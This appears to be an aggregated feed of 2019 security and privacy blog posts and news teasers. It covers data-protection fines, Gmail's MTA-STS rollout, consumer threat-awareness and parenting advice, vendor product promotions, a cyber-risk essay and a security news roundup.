The post Protect Your Privacy Spring Cleaning appeared first on Privacy Ref Blog.

Parenting club Bounty fined £400,000 for selling users’ data

Company illegally shared 34.4m records with 39 companies, information commissioner finds

The parenting club Bounty has been fined £400,000 – one of the largest penalties possible – for sharing its data with marketing agencies without users’ permission.

Bounty offers support and advice to new parents who sign up through its website and mobile app, or are directly recruited on maternity wards. Without securing consent from those parents, the company sold their information to data brokers including Acxiom, Equifax and Sky, the Information Commissioner’s Office (ICO) said.

Continue reading...

PCI Standards in 2019: Q&A with CTO Troy Leach


What do stakeholders need to know about PCI Security Standards in 2019? PCI SSC Chief Technology Officer Troy Leach provides an update on what to expect for changes to existing standards and a look at those in development this year.  

[INFOGRAPHIC] Why choose Seqrite MobiSMART?

Estimated reading time: 1 minute

With the lines increasingly blurring between personal and official work, enterprises are in urgent need of cybersecurity solutions which can secure such kind of communication. Seqrite’s MobiSmart offers one such solution for employees accessing mobile productivity apps on BYOD (Bring Your Own Devices) or CYOD (Choose Your Own Devices). Here’s an infographic illustrating why MobiSmart is a smart choice for your enterprise.

The post [INFOGRAPHIC] Why choose Seqrite MobiSMART? appeared first on Seqrite Blog.

Weekly Update 134

Weekly Update 134

That's the second update in a row I've done on time! It's also another one with a bunch of other things in common with last week, namely commentary on yet more data breaches. It's not just the breaches in HIBP, but the ones I'm busily trying to disclose. This is really sucking a lot of time right now and frankly, well, I summed it up here earlier in the week:

But it's the right thing to do and I'm going to keep at it, even if it means loading data without the organisations involved responding (it certainly won't be the first time). I also go on a bit of a rant about devices and services targeted at monitoring kids and as I say in the video, you'll see precisely why this is such a big issue for me probably next week or the week after. Stay tuned for that one and for now, here's this week's vid:

Weekly Update 134
Weekly Update 134
Weekly Update 134

References

  1. I've got 3 different NDC events with workshops coming up over the next month:
    1. Gold Coast
    2. Minnesota
    3. New York
  2. Knuddles got themselves a €20k fine for their breach (which is now in HIBP)
  3. I ranted on about how crazy the security and privacy implications are for  whole bunch of products and services targeted at monitoring kids (do read - and please share - that thread, here's a Facebook version of it too)
  4. Varonis is sponsoring my blog again this week and they have an excellent free course on insider threats (ok, I may be a little biased on that...)

What to Know About the New Card Production Security Assessor Program


PCI SSC is in the process of launching a new program to train and qualify security professionals to perform assessments using the Card Production Security Standards. Gill Woodcock, Senior Director of Certification Programs, provides an update on this effort and how it will improve the security of payments.

Most Promising Israeli Cybersecurity Startups for 2019

Around 450 cybersecurity companies are operating in Israel, constituting 5% of the global cybersecurity market. The cybersecurity industry was founded in Israel in the late 80s, with the establishment of several local companies that developed anti-virus software and information security. To understand the impact of Israeli companies on the global market, we can mention a few of the well-known Israeli cyber companies: Check Point, Radware, CyberArk, Imperva.

The cybersecurity industry in Israel, which is an important part of Israel’s software industry, includes a wide range of companies that protect from cyber warfare and cybercrime. The sector includes companies operating in it for a long time as independent companies, together with start-up companies that were sold to foreign companies, they continue to operate in Israel as development centers of the acquiring companies. In the list below we will mention the most promising Israeli cybersecurity companies for 2019. We’ve created this list to give an overview of startups that our industry needs to track and be aware of. The companies below are operating in Israel or founded by Israelis, they all award-winning companies. To see the full list of Israeli cybersecurity companies please check our database.

Our list of Most Promising Israeli Cybersecurity Startups for 2019

breach and attack simulation XM CyberXM Cyber

In order to prevent cyber-attacks, organizations should identify in advance attack vectors that hackers will utilize to compromise their critical assets. Moreover, security holes should be remediated as soon as they are created and before attackers utilize them.

XM Cyber’s multi-award-winning breach and attack simulation (BAS) platform identifies continuously attack vectors and prioritizes remediation. The platform provides organizations with a clear understanding, at any given time, of where and how hackers will compromise their crown jewels. XM Cyber was founded by executives from the Israeli cyber intelligence community and has offices in the US, UK, Israel and in Australia.


SilverfortSilverfort

Corporate networks are going through dramatic changes due to IT revolutions like cloud, IoT and BYOD. With countless devices and services connected to each other without clear perimeters, users must be authenticated before accessing any sensitive resources.

Silverfort delivers strong authentication across complex corporate networks and cloud environments, without requiring any software agents, proxies or local configurations. Silverfort seamlessly enables adaptive multi-factor authentication for all sensitive users, devices and resources, including systems that don’t support it today, such as IoT devices, homegrown applications, critical infrastructure and more. Silverfort enables enterprises to prevent data breaches, comply with regulatory requirements and migrate sensitive assets securely to the cloud.


SixgillSixgill

Cybersecurity companies often rely on manual or semi-automatic processes to gather and analyze intelligence, creating a lengthy, expensive and ineffective intelligence cycle that fails to mitigate threats.

Founded in 2014, Sixgill provides cyber threat intelligence solutions based on coverage of exclusive-access to deep and dark web sources, to enterprises around the world including Fortune 500 companies, financial institutions, and law enforcement agencies.

In 2017, Sixgill was awarded a “Top 10 Most Innovative and Promising Companies of the World” at the Netexplo/UNESCO Paris conference and was included in the Disrupt 100. In 2016, Sixgill was named one of the “Top 5 Most Innovative Companies” at CyberTech Tel Aviv.


API Security Salt SecuritySalt Security

Salt Security protects the APIs at the core of every SaaS, web, mobile, microservices and IoT application. Its API Protection Platform is the first patented solution to prevent the next generation of API attacks, using behavioral protection. Deployed in minutes, the AI-powered solution automatically and continuously discovers and learns the granular behavior of APIs and requires no configuration or customization to ensure API protection.

The company was founded in 2016 by alumni of the Israeli Defense Forces (IDF) and serial executives in cybersecurity and in 2019 was selected as a finalist for the RSA Innovation Sandbox.


IntezerIntezer

Intezer’s Genetic Malware Analysis technology identifies code reuse among trusted and malicious software to detect advanced cyber threats. The technology determines whether a file is trusted or malicious, while also classifying the malicious file to its relevant malware family and providing information about the level of sophistication and the threat actor behind the attack, within seconds. The company also offers a free community edition where users can detect code reuse to obtain insights about malware families and threat actors.
Fortune 500 companies leverage Intezer to automate their malware analysis and classification and reduce false positives — improving security operations and accelerating incident response. The company’s technology has provided crucial insights in several high profile cyber attacks before leading engines and government agencies, including APT28, MirageFox, NotPetya and WannaCry.

Intezer was named a Cybersecurity Excellence Awards 2019 winner for Best Cybersecurity Company and Cyber Defense Magazine Infosec 2019 award winners for Cutting Edge Malware Analysis and Incident Response. The company was named an SC Awards USA finalist in the category of Newcomer Security Company of the Year.


Protego’s serverless securityProtego

Serverless applications require unique security solutions. Founded in 2017, Protego’s comprehensive SaaS solution helps organizations embrace serverless technology securely.

The Platform:

· Saves developers & DevSecOps time by automating application hardening & governance within existing pipelines.

· Provides CloudAppSec with serverless app visibility & seamless run-time security with function self protection.

Protego won the 2019 Cybersecurity Excellence Awards for Best Startup and was named a 2019 Company to Watch by SDTimes Magazine. In 2018, Protego won an Innovator Award from SC Magazine, received Frost & Sullivan’s Global New Product Innovation Award, and won most innovative initiative at the CyberTech Tel Aviv Conference.


SepioSepio

Sepio is disrupting the cyber-security industry by uncovering hidden hardware attacks. Sepio Prime provides security teams with full visibility into their hardware assets and their behavior in real time. A comprehensive policy enforcement module allows administrators to easily define granular device usage rules and continuously monitor and protect their infrastructure. Leveraging a combination of physical fingerprinting technology together with device behavior analytics, Sepio’s software-only solution offers instant detection and response to any threat or breach attempt coming from a manipulated or infected element.

Sepio Systems recently was awarded by Frost & Sullivan the Best Practice and Technology Leadership award for RDM (Rogue Device Mitigation) market.


ReblazeReblaze

Founded in 2012, Reblaze is a cloud-based, fully managed protective shield for sites and web applications. Hostile traffic is blocked in the cloud, before it reaches the protected network.
Reblaze is a comprehensive web security solution, providing a next-gen WAF, DoS and DDoS protection, bot mitigation, scraping prevention, CDN, load balancing, and more.
The platform offers a unique combination of benefits. Machine learning provides accurate, adaptive threat detection. Dedicated Virtual Private Clouds ensure maximum privacy. Top-tier infrastructure assures maximum performance. Fine-grained ACLs enable precise traffic regulation. An intuitive web-based management console provides real-time traffic control. A one-month trial offer allows you to assess Reblaze with no cost, risk, or obligation.


Regulus CyberRegulus Cyber

Regulus Cyber offers Defense for Sensors used in Automotive, Maritime and Aviation.
Being the first company focusing entirely on sensor security solutions that protect commonly used sensors for both manned and unmanned systems. The product called Pyramid is offering real-time protection against jamming and spoofing attacks.
These attacks can disable or hack sensors such as GNSS, LiDAR, Radar and other mission-critical components.
Regulus Pyramid has won several awards including AUVSI Excellence 1st place cybersecurity winner and The Cyberstorm Startup Competition and received $6.3 million in funding from leading VCs in Israel and Silicon Valley.


MorphisecMorphisec

Morphisec fundamentally changes the cybersecurity scene by shifting the advantage to defenders, keeping them ahead of attacks with moving target defense.

Emerging from the national cyber security center and from some of the sharpest cyber security minds in Israel, Morphisec provides the ultimate threat prevention by making sure attackers never find the targets they seek.

 


This was our latest list of most promising Israeli cybersecurity startups fro 2019. We hope that you will find what you need. Feel free to contact us if you want to add a company to our list.

The post Most Promising Israeli Cybersecurity Startups for 2019 appeared first on CyberDB.

D.C. Area Crypto Day – Spring 2019

D.C. Area Crypto Day is a bi-annual, one-day regional meeting of cryptographic researchers to promote research collaborations and disseminate fresh, state-of-the-art results in cryptography. Previous D.C.

You Can Now Get This Award-Winning VPN For Just $1/month

If you use the internet (which you clearly do), you likely know how important it is to protect your data in an increasingly dangerous cyber environment. But like other essential tasks that tend to be tedious (like filing taxes early and brushing your teeth for the full two minutes), most installing and running a VPN can sound unappealing to many: sure, they encrypt your internet traffic and hide your location — but they can also run frustratingly slowly, delaying the way you’d usually use the internet for entertainment and work.

That’s where Ivacy VPN is different: not only will the speedy service let you browse and stream lag-free, it also offers real-time threat detection technology, removing malware and viruses at the server level. It ensures that all your downloads and devices stay totally secure, so you can stay safe online without being inconvenienced.

To read this article in full, please click here

Gmail making email more secure with MTA-STS standard



We’re excited to announce that Gmail will become the first major email provider to follow the new SMTP MTA Strict Transport Security (MTA-STS) RFC 8461 and SMTP TLS Reporting RFC 8460 internet standards. Those new email security standards are the result of three years of collaboration within IETF, with contributions from Google and other large email providers.

SMTP alone is vulnerable to man-in-the-middle attacks

Like all mail providers, Gmail uses Simple Mail Transfer Protocol (SMTP) to send and receive mail messages. SMTP alone only provides best-effort security with opportunistic encryption, and many SMTP servers do not prevent certain types of malicious attacks intercepting email traffic in transit.

SMTP is therefore vulnerable to man-in-the-middle attacks. Man-in-the-middle is an attack where communication between two servers is intercepted and possibly changed without detection. Real attacks and prevention were highlighted in our research published in November 2015. MTA-STS will help prevent these types of attacks.

MTA-STS uses encryption and authentication to reduce vulnerabilities

A MTA-STS policy for your domain means that you request external mail servers sending messages to your domain to verify the SMTP connection is authenticated with a valid public certificate and encrypted with TLS 1.2 or higher. This can be combined with TLS reporting, that means your domain can request daily reports from external mail servers with information about the success or failure of emails sent to your domain according to MTA-STS policy.

Gmail is starting MTA-STS adherence. We hope others will follow

Gmail the first major provider to follow the new standard, initially launching in Beta on April 10th 2019. This means Gmail will honor MTA-STS and TLS reporting policies configured when sending emails to domains that have defined these policies. We hope many other email providers will soon adopt these new standards that make email communications more secure.

Email domain administrators should set up DNS records and web server endpoint to configure MTA-STS and TLS reporting policies for incoming emails. Use our Help Center to find out how to set up an MTA-STS policy with your DNS server. G Suite admins can use the G Suite Updates blog to see what MTA-STS means for G Suite domains.

5 Most Common Types of Threats You Need to Know About

Cyber threats sometimes feel unrelenting and are becoming more dangerous every day. While the internet presents users with lots of information and services, it also includes several risks. Cyberattacks are increasing in sophistication and volume, with many cybercriminals using a combination of different types of attacks to accomplish a single goal. Though the list of potential threats is extensive, below you’ll see the most common security threats you should look out for.

1.  Malware

Short for “malicious software,” malware comes in several forms and can cause serious damage to a computer or corporate network. There are various forms of malware ranging from viruses and worms to Trojans and beyond. Malware is often seen as a catch-all term that refers to any software designed to cause damage to a computer, server, or network.

Antivirus software is the most known product to protect your personal devices against malware and is a great start to prevent potential threats. While for enterprises, protecting your endpoint is essential to quickly detect, prevent, and correct advanced threats to your business.

2. Computer Worm:

The distinctive trait of a worm is that it can self-replicate and doesn’t require human interaction to create copies and spread quickly and in great volume. Most worms are spread though tricking internet users and are designed to exploit known security holes in software. Since many employees use their phones for work-related tasks when they are not within the perimeter of their corporate firewall, businesses are at a high risk for potential worms. If a machine is infected, the worm can: corrupt files, steal sensitive data, install a backdoor giving cybercriminals access to your computer, or modify system settings to make your machine more vulnerable.

3. Spam:

Spam refers to unsolicited messages in your email inbox. From the sender’s perspective, spam is a great way to get their message across in an efficient and cost-effective way. While spam is usually considered harmless, some can include links that will install malicious software on your computer if the recipient clicks on it.

How do you recognize malicious spam? First off, if you don’t recognize the sender’s address, don’t open it. Also, if the email addresses you in a generic way, i.e. “Dear customer”, “Hi there” etc., don’t engage. Be aware of the embedded links and check if they have odd URL’s by hovering over them to see where it wants to direct you and if the destination URL matches the destination site you expect.

4. Phishing

Created by cybercriminals attempting to solicit private or sensitive information, phishing schemes tend to be the starting point of nearly all successful cyberattacks. Phishing schemes can disguise itself in many forms, whether its posing as your bank or a common web service, with the sole purpose to lure you in by clicking links and asking you to verify account details, personal information, or passwords. Many people still associate phishing threats with emails, but the threat has evolved beyond your inbox. Hackers are now employing text messages, phone calls, phony apps, and social media quizzes to trick an unwitting victim.

5. Botnet:

Botnet malware is a network of computers that have been hijacked or compromised, giving hackers the ability to control infected computers or mobile devices remotely. When the malware is launched on your computer or mobile device, it recruits your infected device into a botnet, and the hacker is now able to control your device and access all your data in the background without your knowledge.

A botnet can consist of as few as ten computers or hundreds of thousands, and when bots come together, they are a force to be reckoned with. If a botnet hits your corporate website, it can make millions of requests at once ultimately overloading the servers knocking the website offline, slow web traffic, or affect performance. As many businesses are aware, a website that is offline or has a long lag time can be very costly, resulting in a loss of customers or a damaged reputation.

 

For more information check out our Security Awareness Resources and Reports.

The post 5 Most Common Types of Threats You Need to Know About appeared first on McAfee Blogs.

Upcoming cybersecurity events featuring BH Consulting

Here, we list upcoming events, conferences, webinars and training featuring members of the BH Consulting team presenting about cybersecurity, risk management, data protection, GDPR, and privacy. 

Tech Connect Live 2019: Dublin, 30 May

BH Consulting COO Valerie Lyons will be presenting at this event which takes place at the RDS in Dublin on Thursday 30 May. The conference is a business and technology event, with talks on a range of related subjects happening throughout the day. The event is free to attend, and more than 5,000 delegates are expected on the day. To find out more and to register for a free pass, visit here

Data Protection Officer certification course: Vilnius/Maastricht June/July

BH Consulting contributes to this specialised hands-on training course that provides the knowledge needed to carry out the role of a data protection officer under the GDPR. This course awards the ECPC DPO certification from Maastricht University. Places are still available at the courses scheduled for June and July, and a link to book a place is available here

IAM Annual Conference: Dublin, 28-30 August

Valerie Lyons is scheduled to speak at the 22nd annual Irish Academy of Management Conference, taking place at the National College of Ireland. The event will run across three days, and its theme considers how business and management scholarship can help to solve societal challenges. For more details and to register, visit the IAM conference page. 

The post Upcoming cybersecurity events featuring BH Consulting appeared first on BH Consulting.

On World Health Day, Give Your Children the Key to Good Digital Health

My morning walk route takes me past a school that usually has its assembly at 7:00 am. I catch glimpses of students praying, reading out the news, teachers giving talks and often stop to watch them do their morning drill. It’s an arresting sight – 500 kids in bright uniforms moving in a synchronized manner to drumbeats. The school is doing it right; light exercises before the start of the academic day helps to enhance positivity, concentration power, alertness and readiness to learn. After all it’s an age-old saying, ‘A healthy mind resides in a healthy body.’

Perhaps you are wondering why McAfee Cybermum is discussing health. Well, 7th April was World Health Day and what better time than this to have a heart-to-heart on good health, especially, good digital health?

Let’s accept it- we are parents, first and foremost, and our focus is always (even when we are sleeping or partying or just chilling) on our kids. All we want is to raise happy, well-adjusted kids who will be able to think rationally and act for themselves and know how to stay safe- both in the real and in the digital world.

When we were kids, outdoors was the place to be! Life centered around our gardens, parks and roads outside our houses; where we spent hours playing, chatting or just hanging around. Today’s digital kids also play and socialize a lot, but the bulk of it happens online. They have their favourite hanging out zones, gaming sites, digital libraries, social media etc. We all are quite tech-savvy and so, we are well aware how addictive digital activities can be as well as how the long hours spent online can have adverse effects on health and mind. This is why we worry when our kids prefer digital lives to the real one; we take measures like setting device-use rules and see red if the rules are breached.

But losing our cool isn’t the solution- we need to promote a balanced digital life, right from the day the little tykes mark their initiation into the digital world and educate them and act as their digital role models.

Here’s how you can ensure a healthy digital life for your kids:

Health is wealth

Play games, swim, run, exercise, go for treks! It’s also a good opportunity to show them that devices can be put to other uses besides gaming and socializing, viz; tracking activity and monitoring health statistics. When they are using devices, teach them the right postures so that they don’t strain their back or eyes.

Balance is the keyword

Often, we forget to practice what we preach- which, in this case, is to have some device-free hours. Keep your device away (a) when with family, (b) when there’s company, and (c) during bedtime. Children will protest and perhaps bawl, but will also learn a valuable lesson, rather two lessons – There are other sources of entertainment besides devices, and a NO means NO. While the first lesson is important to lead a balanced digital life, the second one is important for them in the real world too.

Fix up an activity schedule that includes household chores

Not only will this help to maintain digital balance, it will also give the child the first lesson in responsibility. Whether it is making their own beds, cleaning out their wardrobes or helping to wash the car or set the table, these are values you are teaching kids non-verbally. Even little tykes can do small tasks and trust me, it will make them feel proud. Just take care that the daily timetable doesn’t start resembling an army cadet’s training schedule.

Set clear-cut rules

This helps kids learn discipline. Stress on how excessive use is akin to misuse. Their daily schedule should specify timings for device use. If they breach the timings, bring it up immediately. Repeated breaches need to be tackled firmly. Maybe the privilege of using the device needs to be surrendered for a few days. This, you as a parent need to decide.

Let them know you will be remotely monitoring their activities

It’s recommended that you mentor kids in the digital world till they are mature enough to handle matters responsibly themselves. Use parental controls that come with comprehensive security tools like McAfee Total Protection or McAfee LiveSafe and keep the admin password a secret. BUT LET YOUR KIDS KNOW you would be supervising them online. Explain it’s similar to how you keep an eye on them at public places. Remember to set internet timings and filters.

Have purposeful family activity time

Use that evening hour before or after dinner to chat, play board games, tell stories or discuss the news. Share, play, connect- the perfect ingredients for a close-knit family! And of course, all devices, including the digital assistant, is off-limit during this time.

Teach kids to be upstanders

Online abuse can lead to emotional disturbances in vulnerable kids. Even adults are negatively affected by cyberbullying and trolling and so you can understand the impact of such behavior on kids. Give your kids the security of your love and trust so that they grow up to be strong and confident and can stand up against bullies.

Discuss cybersafety often and with due seriousness

Living in the connected age, where we all use the same router for our devices along with other smart devices like CCTV, digital assistants etc., it is important to reinforce how the carelessness of one can affect the safety and privacy of all other family members. A safe and secure net connection is needed for mental wellness.

So, what are you waiting for? Start working on your family’s digital health today!

The post On World Health Day, Give Your Children the Key to Good Digital Health appeared first on McAfee Blogs.

Seqrite MobiSMART for GDPR Compliance

Estimated reading time: 2 minutes

It has almost been a year now that the General Data Protection Regulation (GDPR) has come into effect. A landmark legislation in the history of data protection, GDPR has changed the way enterprises approach cybersecurity. With its many definitions and focus on data protection and security, enterprises, which deal with data belonging to EU citizens, have to be much more proactive when it comes to complying with the legislation.

The consequences of non-compliance can have very steep financial consequences with penalties for non-compliance ranging up to 20 million Euros or 4% of a company’s annual turnover, whichever is higher. Organizations hence must concentrate on sufficient endpoint management that fortifies the security of their Enterprise Mobility Management (EMM) and Mobile Device Management (MDM) systems.

An enterprise’s mobile workforce occupies the far reaches of the security perimeter and constitutes the most vulnerable threat vectors to the data protected by GDPR. That is why organizations can consider Seqrite MobiSMART, a powerful tool to secure control of critical data, to remain compliant with GDPR regulations.

Take control of your data – A key feature through which Seqrite MobiSMART can help with GDPR compliance is by offering an unhindered, easy access to data consumption in your enterprise. This can be through the single console management for all devices which offers a one-stop view into how data is being consumed in your enterprise.

Fencing and Data Monitoring – GDPR puts great importance on the distinction between personal and official data. MobiSMART offers an easy way to maintain that distinction through its fencing and data monitoring features which allow digital boundaries to be defined. Data usage can easily be monitored through mobile and Wi-FI networks.

Build-in mobile security – MobiSMART’s built-in security features helps you keep your devices secure and ensure you will not fall foul of GDPR’s compliance laws. With a best in-class anti-malware, strong anti-theft features and excellent web security, enterprises will know that their cybersecurity issues are in safe hands.

Keep control of your apps – Applications can often have malicious consequences but MobiSMART allows enterprises to stay in control of applications. Apps can be pushed from server to mobile devices with administrators possessing the ability to blacklist certain apps. Custom applications can also be pushed to the Enterprise App Store.

For those of you still struggling with enterprise-wide visibility to user activity, Seqrite MobiSMART can be a trusted resource for providing a viable and fully-functioning app workspace for your mobile workforce that’s NIST-certified secure.

The post Seqrite MobiSMART for GDPR Compliance appeared first on Seqrite Blog.

What you don’t know may (pleasantly) surprise you

Today I find myself in Louisville, KY performing a privacy assessment for a client. When visiting clients to perform an assessment, I meet with team members from all parts of the organization. Usually, I am accompanied by someone from the privacy office or legal team. Frequently, my escorts learn something new about the business and […]

The post What you don’t know may (pleasantly) surprise you appeared first on Privacy Ref Blog.

Cyber Security: Three Parts Art, One Part Science

As I reflect upon my almost 40 years as a cyber security professional, I think of the many instances where the basic tenets of cyber security—those we think have common understanding—require a lot of additional explanation. For example, what is a vulnerability assessment? If five cyber professionals are sitting around a table discussing this question, you will end up with seven or eight answers. One will say that a vulnerability assessment is vulnerability scanning only. Another will say an assessment is much bigger than scanning, and addresses ethical hacking and internal security testing. Another will say that it is a passive review of policies and controls. All are correct in some form, but the answer really depends on the requirements or criteria you are trying to achieve. And it also depends on the skills and experience of the risk owner, auditor, or assessor. Is your head spinning yet? I know mine is! Hence the “three parts art.”

There is quite a bit of subjectivity in the cyber security business. One auditor will look at evidence and agree you are in compliance; another will say you are not. If you are going to protect sensitive information, do you encrypt it, obfuscate it, or segment it off and place it behind very tight identification and access controls before allowing users to access the data? Yes. As we advise our client base, it is essential that we have all the context necessary to make good risk-based decisions and recommendations.

Let’s talk about Connection’s artistic methodology. We start with a canvas that has the core components of cyber security: protection, detection, and reaction. By addressing each of these three pillars in a comprehensive way, we ensure that the full conversation around how people, process, and technology all work together to provide a comprehensive risk strategy is achieved.

Protection:

People
Users understand threat and risk, and know what role they play in the protection strategy. For example, if you see something, say something. Don’t let someone surf in behind you through a badge check entry. And don’t think about trying to shut off your end-point anti-virus or firewall.

Process
Policy are established, documented, and socialized. For example, personal laptops should never be connected to the corporate network. Also, don’t send sensitive information to your personal email account so you can work from home.

Technology
Some examples of the barriers used to deter attackers and breaches are edge security with firewalls, intrusion detection and prevention, sandboxing, and advanced threat detection.

Detection:

The average mean time to identify an active incident in a network is 197 days. The mean time to contain an incident is 69 days.

People
Incident response teams need to be identified and trained, and all employees need to be trained on the concept of “if you see something, say something.” Detection is a proactive process.

Process
What happens when an alert occurs? Who sees it? What is the documented process for taking action?

Technology
What is in place to ensure you are detecting malicious activity? Is it configured to ignore noise and only alert you of a real event? Will it help you bring that 197-day mean time to detection way down?

Reaction:

People
What happens when an event occurs? Who responds? How do you recover? Does everyone understand their role? Do you War Game to ensure you are prepared WHEN an incident occurs?

Process
What is the documented process to reduce the Kill Chain—the mean time to detect and contain—from 69 days to 69 minutes? Do you have a Business Continuity and Disaster Recovery Plan to ensure the ability to react to a natural disaster, significant cyber breach such as ransomware, DDoS, or—dare I say it—a pandemic?

Technology
What cyber security consoles have been deployed that allow quick access to patch a system, change a firewall rule, switch ACL, or policy setting at an end point, or track a security incident through the triage process?

All of these things are important to create a comprehensive InfoSec Program. The science is the technology that will help you build a layered, in-depth defense approach. The art is how to assess the threat, define and document the risk, and create a strategy that allows you to manage your cyber risk as it applies to your environment, users, systems, applications, data, customers, supply chain, third party support partners, and business process.

More Art: Are You a Risk Avoider or Risk Transference Expert?

A better way to state that is, “Do you avoid all risk responsibility or do you give your risk responsibility to someone else?” Hint: I don’t believe in risk avoidance or risk transference.

Yes, there is an art to risk management. There is also science if you use, for example, The Carnegie Mellon risk tools. But a good risk owner and manager documents risk, prioritizes it by risk criticality, turns it into a risk register or roadmap plan, remediates what is necessary, and accepts what is reasonable from a business and cyber security perspective. Oh, by the way, those same five cyber security professional we talked about earlier? They have 17 definitions of risk.

As we wrap up this conversation, let’s talk about the importance of selecting a risk framework. It’s kind of like going to a baseball game and recognizing the program helps you know the players and the stats. What framework will you pick? Do you paint in watercolors or oils? Are you a National Institute of Standards (NIST) artist, an Internal Standards Organization artist, or have you developed your own framework like the Nardone puzzle chart? I developed this several years ago when I was the CTO/CSO of the Commonwealth of Massachusetts. It has been artistically enhanced over the years to incorporate more security components, but it is loosely coupled on the NIST 800-53 and ISO 27001 standards.

When it comes to selecting a security framework as a CISO, I lean towards the NIST Cyber Security Framework (CSF) pictured below. This framework is comprehensive, and provides a scoring model that allows risk owners to measure and target what risk level they believe they need to achieve based on their business model, threat profile, and risk tolerance. It has five functional focus areas. The ISO 27001 framework is also a very solid and frequently used model. Both of these frameworks can result in a Certificate of Attestation demonstrating adherence to the standard. Many commercial corporations do an annual ISO 27001 assessment for that very reason. More and more are leaning towards the NIST CSF, especially commercial corporations doing work with the government.

The art in cyber security is in the interpretation of the rules, standards, and requirements that are primarily based on a foundation in science in some form. The more experience one has in the cyber security industry, the more effective the art becomes. As a last thought, keep in mind that Connection’s Technology Solutions Group Security Practice has over 150 years of cyber security expertise on tap to apply to that art.

The post Cyber Security: Three Parts Art, One Part Science appeared first on Connected.

What’s in Your IoT Cybersecurity Kit?

Did you know the average internet-enabled household contains more than ten connected devices? With IoT devices proliferating almost every aspect of our everyday lives, it’s no wonder IoT-based attacks are becoming smarter and more widespread than ever before. From DDoS to home network exposures, it appears cybercriminals have set their sights on the digital dependence inside the smart home — and users must be prepared.

A smart home in today’s world is no longer a wave of the future, but rather just a sign of the times we live in. You would be hard pressed to find a home that didn’t contain some form of smart device. From digital assistants to smart plugs, with more endpoints comes more avenues bad actors can use to access home networks. As recently as 2018, users saw virtual assistants, smart TVs, and even smart plugs appear secure, but under the surface have security flaws that could facilitate home network exposures by bad actors in the future. Whereas some IoT devices were actually used to conduct botnet attacks, like an IoT thermometer and home Wi-Fi routers.

While federal agencies, like the FBI, and IoT device manufacturers are stepping up to do their part to combat IoT-based cyberattacks, there are still precautions users should take to ensure their smart home and family remain secure. Consider this your IoT cybersecurity kit to keep unwelcome visitors out of your home network.

  • When purchasing an IoT device, make security priority #1. Before your next purchase, conduct due diligence. Prioritize devices that have been on the market for an extended period of time, have a trusted name brand, and/or have a lot of online reviews. By following this vetting protocol, the chances are that the device’s security standards will be higher.
  • Keep your software up-to-date on all devices. To protect against potential vulnerabilities, manufacturers release software updates often. Set your device to auto-update, if possible, so you always have the latest software. This includes the apps you use to control the device.
  • Change factory settings immediately. Once you bring a new device into your home, change the default password to something difficult to guess. Cybercriminals often can find the default settings online and can use them to access your devices. If the device has advanced capabilities, use them.
  • Secure your home network. It’s important to think about security as integrated, not disconnected. Not all IoT devices stay in the home. Many are mobile but reconnect to home networks once they are back in the vicinity of the router. Protect your network of connected devices no matter where they go. Consider investing in advanced internet router that has built-in protection that can secure and monitor any device that connects to your home network.
  • Use comprehensive security software. Vulnerabilities and threats emerge and evolve every day. Protect your network of connected devices no matter where you are with a tool like McAfee Total Protection.

Interested in learning more about IoT and mobile security trends and information? Follow @McAfee_Home on Twitter, and ‘Like” us on Facebook.

The post What’s in Your IoT Cybersecurity Kit? appeared first on McAfee Blogs.

UK hacker jailed for six years for blackmailing pornography site users

Zain Qaiser targeted millions of computers with ransomware demanding large sums

A hacker who blackmailed users of pornography websites in what investigators say is the UK’s most serious cybercrime case has been jailed for six years and five months.

Zain Qaiser targeted millions of computers with malicious browser-locking software that demanded payment of up to $1,000 (£765) to unfreeze screens, Kingston crown court heard.

Continue reading...

Security roundup: April 2019

We round up interesting research and reporting about security and privacy from around the web. This month: healthy GDPR, gender rebalance, cookie walls crumble, telecom threats and incident response par excellence.

A healthy approach to data protection

Ireland’s Department of Health is now considering amendments to the Health Research Regulations, with data protection as one of the areas under review. The Health Research Consent Declaration Committee, which was formed as part of the Health Research Regulations made under GDPR, confirmed the possible amendments in a statement on its website.

GDPR triggered significant changes to health research because of the obligations on data protection impact assessments. Our senior data protection consultant Tracy Elliott has blogged about this issue.

The newly announced engagement process may lead to changes to the Health Research Regulations “where any such amendments are sound from a policy perspective and legally feasible”, the HRCDC said. There’s a link to a more detailed statement on the proposed amendments at this link.

A welcome improvement

Women now make up almost a quarter of information security workers, according to new figures from ISC(2). For years, female participation in security roles hovered around the 10-11 per cent mark. The industry training and certification group’s latest statistics show that figure is much higher than was generally thought.

Some of this increase is due to the group widening its parameters beyond pure cybersecurity roles. The full report shows that higher percentages of women security professionals are attaining senior roles. This includes chief technology officer (7 per cent of women vs. 2 per cent of men), vice president of IT (9 per cent vs. 5 per cent), IT director (18 per cent vs. 14 per cent) and C-level or executive (28 per cent vs. 19 per cent).

“While men continue to outnumber women in cybersecurity and pay disparity still exists, women in the field are buoyed by higher levels of education and certifications, and are finding their way to leadership positions in higher numbers,” ISC(2) said.

The trends are encouraging for any girls or women who are considering entering the profession; as the saying goes, if you can see it, you can be it. (The report’s subtitle is ‘young, educated and ready to take charge’.) After the report was released, Kelly Jackson Higgins at Dark Reading tweeted a link to her story from last year about good practice for recruiting and retaining women in security.

Great walls of ire

You know those annoying website pop-ups that ask you to accept cookies before reading further? They’re known as cookie walls or tracker walls, and the Dutch data protection authority has declared that they violate the General Data Protection Regulation. If visitors can’t access a website without first agreeing to be tracked, they are being forced to share their data. The argument is that this goes against the principle of consent, since the user has no choice but to agree if they want to access the site.

Individual DPAs have taken different interpretations on GDPR matters. SC Magazine quoted Omar Tene of the International Association of Privacy Professionals, who described the Dutch approach as “restrictive”.

This might be a case of GDPR solving a problem of its own making: The Register notes that cookie consent notices showed a massive jump last year, from 16 per cent in January to 62.1 per cent by June.

Hanging on the telephone

Is your organisation’s phone system in your threat model? New research from Europol’s European Cybercrime Centre and Trend Micro lifts the lid on network-based telecom fraud and infrastructure attacks. The Cyber-Telecom Crime Report includes case studies of unusual attacks to show how they work in the real world.

By accessing customers’ or carriers’ accounts, criminals have a low-risk alternative to traditional forms of financial fraud. Among the favoured tactics are vishing, which is a voice scam designed to trick people into revealing personal or financial information over the phone. ‘Missed call’ scams, also known as Wangiri, involve calling a number once; when the recipient calls back, thinking it’s a genuine call, they connect to a premium rate number. The report includes the eye-watering estimate that criminals make €29 billion per year from telecom fraud.

Trend Micro’s blog takes a fresh angle on the report findings, focusing on the risks to IoT deployments and to the arrival of 5G technology. The 57-page report is free to download from this link. Europol has also launched a public awareness page about the problem.  

From ransom to recovery

